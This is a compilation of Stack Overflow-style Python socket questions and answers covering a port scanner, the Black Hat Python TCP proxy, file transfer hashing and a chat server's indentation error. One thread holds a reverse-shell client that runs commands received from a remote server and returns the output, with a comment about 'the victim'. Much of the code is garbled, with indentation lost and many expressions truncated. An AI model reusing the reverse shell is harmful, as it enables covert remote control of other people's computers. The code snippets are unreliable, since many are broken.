create a range from arguments - python

Really new to python but I'm trying to practice and do things using python to make the learning experience interesting, I am trying to do a a scanner for a range of ports, but I want to specify the ports as a cli argument. However, when I put them on the range, nothing happens so I think I'm not parsing the arguments properly, how do I do this?
Here is part of my code:
host = sys.argv[1]
first_port = sys.argv[2]
ending_port = sys.argv[3]
print "Checking ports on the range of " + start_port + " to " + end_port
for port in range(first_port, ending_port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = s.connect_ex((host, port))
if result == 0:
print "--> Port " + str(port) + "open"
If I put range(1, 1024) it does work but is not liking the way I pass my arguments. Also, I tried converting to int with first_port = int(sys.argv[2]) for example, but again nothing happens. What am I missing on this?

first_port = sys.argv[2]
ending_port = sys.argv[3]
print "Checking ports on the range of " + start_port + " to " + end_port
first_port = int(sys.argv[2])
ending_port = int(sys.argv[3])
print "Checking ports on the range of {} to {}".format(first_port, ending_port)
yields the correct behavior. Also, you probably want to range on
for port in range(first_port, ending_port+1):
since the end of range is non-inclusive.
The big lesson here (in my opinion) is don't use pass in an except unless you explicitly know it should be passed. If you had some error with your input params then you would just be swallowing the exception instead of getting a helpful stacktrace / error message.


Black Hat Python proxy tool no data

I recently bought the book Black Hat Python, 2nd Edition, by Justin Seitz, which seems to be a very good book about networking and all that (i am writing my code on Kali Linux)
I have a problem on the TCP Proxy Tool on chapter 2 :
Here is the code :
import sys
import socket
import threading
HEX_FILTER = ''.join(
[(len(repr(chr(i))) == 3) and chr(i) or '.' for i in range(256)])
def hexdump(src, length = 16, show = True):
# basically translates hexadecimal characters to readable ones
if isinstance(src, bytes):
src = src.decode()
results = list()
for i in range(0, len(src), length):
word = str(src[i:i+length])
printable = word.translate(HEX_FILTER)
hexa = ' '.join(['{ord(c):02X}' for c in word])
hexwidth = length*3
results.append('{i:04x} {hexa:<{hexwidth}} {printable}')
if show :
for line in results :
else :
return results
def receive_from(connection):
buffer = b""
try :
while True :
data = connection.recvfrom(4096)
if not data :
buffer += data
except Exception as e:
return buffer
def request_handler(buffer):
# perform packet modifications
return buffer
def response_handler(buffer):
# perform packet modifications
return buffer
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, remote_port))
if receive_first :
# Check for any data to receive before
going into the main loop (i guess)
remote_buffer = receive_from(remote_socket)
remote_buffer = response_handler(remote_buffer)
if len(remote_buffer):
print("[<==] Sending %d bytes to localhost." % len(remote_buffer))
while True : # Start the loop
local_buffer = receive_from(client_socket)
if len(local_buffer):
line = "[==>] Received %d bytes from localhost." % len(local_buffer)
local_buffer = request_handler(local_buffer)
print("[==>] Sent to remote.")
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[==>] Received %d bytes from remote." % len(remote_buffer))
print("[<==] Sent to localhost.")
if not len(local_buffer) or not len(remote_buffer):
# If no data is passed, close the sockets and breaks the loop
print("[*] No more data. Closing connections. See you later !")
def server_loop(local_host, local_port, remote_host, remote_port, receive_first):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try :
server.bind((local_host, local_port)) # Bind the local host and the local port
except Exception as e:
print('Problem on bind : %r' %e)
# If an error occurs, prints a
print("[!] Failed to listen on %s:%d" % (local_host, local_port))
print("[!] Check for other listening sockets or correct permissions.")
print("[*] Listening on %s:%d" % (local_host, local_port))
while True :
client_socket, addr = server.accept()
# print out the local connection information
line = "> Received incoming connection from %s:%d" % (addr[0], addr[1])
# start a thread to talk to the remote host
proxy_thread = threading.Thread(
target = proxy_handler,
remote_port, receive_first))
def main():
if len(sys.argv[1:]) != 5:
print("Usage: ./ [localhost] [localport]")
print("[remotehost] [remoteport] [receive_first]")
print("Example : ./ 9000 9000 True")
loca l_host = sys.argv[1]
local_port = int(sys.argv[2])
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else :
receive_first = False
server_loop(local_host, local_port,
remote_host, remote_port, receive_first)
if __name__ == '__main__':
(sorry, i had a bit of a trouble formatting it and it's quite long)
Now, normally, i just need to open 2 terminals and run the code with the command line :
sudo python 21 21 True
in one terminal, and :
ftp 21
in the other one.
My code seems to be working fine, except that... I receive no data. I tried different ftp servers (notice that i don't use the one quoted in the book), but it still doesn't work. It just says :
[*] Listening on
> Received incoming connection from
but it doesn't actually displays anything until the connexion times out or that i stop the command with Ctrl + C.
I know this question has already been asked, but they don't resolve my problem.
Please tell me if i forgot a line of code (for example the one that prints the data on the screen lol) or did anything wrong :)
one the hexa variable you need to put and f'{ord(c):02x}' because you just have a string and not using the 'c' variable from the list comprehension. That's a small typo you missed fix that and try the whole process again.
hexa = ' '.join([f'{ord(c):02X}' for c in word])
The f should be here ^

how to get user PC name in socket programming python

I write a socket programming code and and it work awesome. Now I face a little problem I want to get the name of PC and show it like this device is connected below is the code. I tried different method but all fail. Basically, I have a couple Windows computers on my network that will be running a python script. So through this method I will know all computer name
import os, socket, subprocess ,getpass
def shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = ''
port = 9995
s.connect((host, port))
# userName = getpass.getuser()
# s.send(str.encode(userName))
# print(userName)
while True:
data = s.recv(800000)
if data[:2].decode("utf-8") == 'cd':
if len(data) > 0:
cmd = subprocess.Popen(data[:].decode("utf-8"),shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
output_byte = +
output_str = str(output_byte,"utf-8")
currentWD = os.getcwd() + "> "
s.send(str.encode(output_str + currentWD))
# print(output_str) # if you want to show the output to the victim
if __name__ == "__main__":
below is server code
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
conn.send(str.encode(' '))
del all_connections[i]
del all_address[i]
results = str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
print("----Clients----" + "\n" + results)
it gave me output like this
0 55747
I want output like this:::
0 PC_NAME 55747
You can attempt to call socket.gethostbyaddr() on the IP address.
However, that depends on the DNS configuration of the server system - there's no real guarantee that the machines have registered their names with the local name server.

Script stops checking ports after one port is detected as open

I know this is probably a really simple fix but I cannot think of what I have done wrong. I am stumped. After the port finds out that one port is open, the code spams "not open" despite some of these ports actually in fact being open.
For example, port 135 and 445 are open on my network. When I input a scan between 135 and 445, the computer does not even scan the ports, it just spams that everything past 135 is not open, including 445.
Already tried:
Stating result variable in both the if and else statements instead of a separate line of code.
Changing the spn = spn + 1 line to "port"
while True:
#Shortens string of code.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#The IP address that will be implemented into the result.
ip = str(input("\nCheck IP Address: ")).strip()
#The port number that will be implemented into the result.
port = int(input("\nCheck Port: "))
#What the script is going to check.
result = sock.connect_ex((ip, port))
#If user types 0, a complete scan will occur.
if port == 0:
#Highest/lowest port to check.
spn = int(input("\nStarting port: "))
fpn = int(input("\nFinal port: "))
print(" ")
result = sock.connect_ex((ip, spn))
while spn <= fpn:
#Prints which ports are open.
if result == 0:
print (("Port ") + str(spn) + (" is OPEN"))
#Prints which ports are not open.
print (("Port ") + str(spn) + (" is NOT OPEN"))
result = sock.connect_ex((ip, spn))
spn = spn + 1
#Prints if ONE port is open.
if result == 0:
print (("\nPort ") + str(port) + (" is OPEN"))
#Prints if ONE port is not open.
print (("\nPort ") + str(port) + (" is NOT OPEN"))
The code should be able to check every port individually instead of saying everything after the first port is open.
You can't reuse your sock object like that. After the first successful connect, the socket is connected and can't just connect again. This is why all further connects fail.
I would recommend replacing result = sock.connect_ex((ip, spn)) with this:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
result = sock.connect_ex((ip, spn))
if result: sock.shutdown(socket.SHUT_RDWR)

python socket file transfer verified with sha256 not working, but only sometimes?

Client side:
def send_file_to_hashed(data, tcpsock):
f = data
flag = 0
l =
while True:
while (l):
tcpsock.send(hashlib.sha256(l).hexdigest() + l)
hashok = tcpsock.recv(6)
if hashok == "HASHOK":
l =
flag = 1
if hashok == "BROKEN":
flag = 0
if not l:
return (tcpsock,flag)
def upload(filename):
flag = 0
while(flag == 0):
with open(os.getcwd()+'\\data\\'+ filename +'.csv', 'rU') as UL:
tuplol = send_file_to_hashed(UL ,send_to_sock(filename +".csv",send_to("upload",TCP_IP,TCP_PORT)))
(sock,flagn) = tuplol
flag = flagn
Server Side:
elif(message == "upload"):
message = rec_OK(self.sock)
fis = os.getcwd()+'/data/'+ time.strftime("%H:%M_%d_%m_%Y") + "_" + message
f = open(fis , 'w')
latest = open(os.getcwd()+'/data/' + message , 'w')
filehash = rec_OK(self.sock)
print("filehash:" + filehash)
while True:
rawdata = self.sock.recv(BUFFER_SIZE)
log.write("rawdata :" + rawdata + "\n")
data = rawdata[64:]
dhash = rawdata[:64]
log.write("chash: " + dhash + "\n")
log.write("shash: " + hashlib.sha256(data).hexdigest() + "\n")
if dhash == hashlib.sha256(data).hexdigest():
log.write("HASHOK\n" )
print "HASHNO"
if rawdata == "DONE":
f = open(fis , 'r')
if (hashlib.sha256( == filehash):
print "ULDONE"
print hashlib.sha256(
print filehash
print "BROKEN UL"
So the data upload is working fine in all tests that i ran from my computer, even worked fine while uploading data over my mobile connection and still sometimes people say it takes a long time and they kill it after a few minutes. the data is there on their computers but not on the server. I don't know what is happening please help!
First of all: this is unrelated to sha.
Streaming over the network is unpredictable. This line
rawdata = self.sock.recv(BUFFER_SIZE)
doesn't guarantee that you read BUFFER_SIZE bytes. You may have read only 1 byte in the worst case scenario. Therefore your server side is completely broken because of the assumption that rawdata contains whole message. It is even worse. If the client sends command and hash fast you may get e.g. rawdata == 'DONEa2daf78c44(...) which is a mixed output.
The "hanging" part just follows from that. Trace your code and see what happens when the server receives partial/broken messages ( I already did that in my imagination :P ).
Streaming over the network is almost never as easy as calling sock.send on one side and sock.recv on the other side. You need some buffering/framing protocol. For example you can implement this simple protocol: always interpret first two bytes as the size of incoming message, like this:
client (pseudocode)
# convert len of msg into two-byte array
# I am assuming the max size of msg is 65536
buf = bytearray([len(msg) & 255, len(msg) >> 8])
server (pseudocode)
size = to_int(sock.recv(1))
size += to_int(sock.recv(1)) << 8
# You need two calls to recv since recv(2) can return 1 byte.
# (well, you can try recv(2) with `if` here to avoid additional
# syscall, not sure if worth it)
buffer = bytearray()
while size > 0:
tmp = sock.recv(size)
buffer += tmp
size -= len(tmp)
Now you have properly read data in buffer variable which you can work with.
WARNING: the pseudocode for the server is simplified. For example you need to check for empty recv() result everywhere (including where size is calculated). This is the case when the client disconnects.
So unfortunately there's a lot of work in front of you. You have to rewrite whole sending and receving code.

Unindent does not match any outer indentation level

On line 51/52, I get the error:
Unindent does not match any outer indentation level.
I understand this has something to do with tabs and spaces.
Note I did not write this code, I found it online and plan to modify it.
Full code (also at
import os
import re
import socket
import sys
import time
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create socket
server_socket.bind(("", 9020)) #Bind server to this socket
server_socket.listen(4) #Max number of queued connections
# Welcome message
print ("TCP chat server now awaiting client connection on port 9020...")
chat_log = [] #Contains chat log
time = time.strftime('%l:%M %p %Z on %b %d, %Y') #Server start time formatted nicely
start_time = str(time) #Convert server start time to string
username = "ChatUser" #Default server username if user does not provide one
# Support ~2^x client connections, where x is the number of process forks
# This variable contains the help documentation for the "help" command
chatHelp = ("The chat server accepts the following commands:\n"
+ "adios Closes the program\n"
+ "connection Shows client connection info (IP, port)\n"
+ "get Returns complete chat log\n"
+ "getrange <#> <#> Get chat log entries from <#> to <#> (starts at 1)\n"
+ "help Lists valid commands\n"
+ "name: <text> Sets your username to <text>\n"
+ "test: <text> Echo data back to you <text>\n"
+ "time Shows time when server was initiated\n"
+ "push: <text> Add <text> to chat log\n"
+ "save Save chat log to file\n")
while 1:
# Accept connection
client_socket, address = server_socket.accept()
# Print connection info from client for server log
print ("Received connection from client at"), address
# Used in the connection command function (client request) below
connection = str(address)
# Send welcome string to client
client_socket.send("Welcome to Nigel's chat room! You are logged in as ChatUser.\n Type help for a list of valid commands.\n")
# Loop indefinitely while server running
while 1:
data = client_socket.recv(2048) #Receive client data into buffer
process_data = data.lower() #Lowercase received data for processing
print ("Data received from client>>"), process_data #Print data received from client for log reference
# Functions for the received commands (I use the find library to reduce compatibility errors with other languages)
# ---"adios" command function---
if (process_data.find("adios") == 0):
client_socket.close() #Close socket connection
print ("<Ctrl+C to exit.>>")
# ---"connection:" command function---
elif(process_data.find("connection") == 0):
client_socket.send("Client connection info: " + connection + "\n")
print "User requested connection information"
# ---"getrange" command function w/ regular expression filtering (must be BEFORE "get" command function)---
elif(re.match(r'getrange\s+(\d+)\s+(\d+)',process_data)): # Regex to find correct match with dynamic numbers input
match = re.match(r'getrange\s+(\d+)\s+(\d+)',process_data)
getValue = "Chat log from range "+ + " and " + + ":\n" # Grab first and second range number provided by client
if(len(chat_log) >= int( and len(chat_log) >= int( # Check to see if chat log extends to given range
count = int( - 1
while(count < int(
getValue += chat_log[count] + "\n"
count += 1
getValue += "<>\n" #No data in range provided by client
client_socket.send(getValue) #Send results to client
# ---"get" command function---
elif(process_data.find("get") == 0):
log = "Chat log: \n"
for item in chat_log:
log += item+" \n"
# ---"help:" command function---
elif(process_data.find("help") == 0):
client_socket.send(chatHelp + "\n")
print "User requested help"
# ---"name:" command function---
elif(process_data.find("name:") == 0):
username = data[5:].strip() #Only grab the value client set (not "name:")
client_socket.send("Username set to: " + data[5:] + "\n")
# ---"test:" command function---
elif(process_data.find("test:") == 0):
client_socket.send(data[5:]+"\n") #Echo last 5 elements to client
print data
# ---"time" command function---
elif(process_data.find("time") == 0):
client_socket.send("Chat server was started at: " + start_time + "\n")
print "User requested server start time"
# ---"save" command function---
elif(process_data.find("save") == 0):
print "(Saving chat log to file)"
client_socket.send("Saving chat log to file..." + "\n")
filename = "chat.log"
file = open(filename,"w") #Create file
for item in chat_log: #Loop through elements in chat_log
file.write("%s\n" % item) #Write elements one by one on a new line
file.close() #Close/write file
# ---"push" command function---
elif(process_data.find("push:") == 0):
print "(Pushing data to chat log)"
if(username != ""):
chat_log.append(username + ": " + data[5:].strip()) #Save actual chat text to log (not "push:")
print "<<Unknown Data Received>>",data #Server log
client_socket.send("Unrecognized command: " + data + "") #Advise client of invalid command
except socket.error, e:
print "<<Ctrl+C to exit>>" #Server log
Python code is sensitive to the indent level you use. Your code reads:
if (process_data.find("adios") == 0):
client_socket.close() #Close socket connection
print ("<Ctrl+C to exit.>>")
Inside the if block, the statements must all line up. Notice how client_socket.close() and the following print statement have different indent levels. You need to change this so that they both have the same indent, like this:
if (process_data.find("adios") == 0):
client_socket.close() #Close socket connection
print ("<Ctrl+C to exit.>>")
The code presently reads:
if (process_data.find("adios") == 0):
client_socket.close() #Close socket connection
print ("<Ctrl+C to exit.>>")
The first statement in the body of the if is indented 6 spaces, while the last two statements are only indented by 1 space. The indentation level ought to be same and consistent throughout the program, something like this:
if (process_data.find("adios") == 0):
client_socket.close() #Close socket connection
print ("<Ctrl+C to exit.>>")
The indentation in the code doesn't seem very standard (or consistent). For instance the body of the while loop in 41/42 is indented more than other bodies of similar statements, e.g., lines 31-33, that's trouble in a language like Python where whitespace matters.
Finally, note it's not a good idea to mix tabs and spaces. PEP 8 -- Style Guide for Python Code recommends the use of spaces over tabs and an indentation of 4 spaces per level.
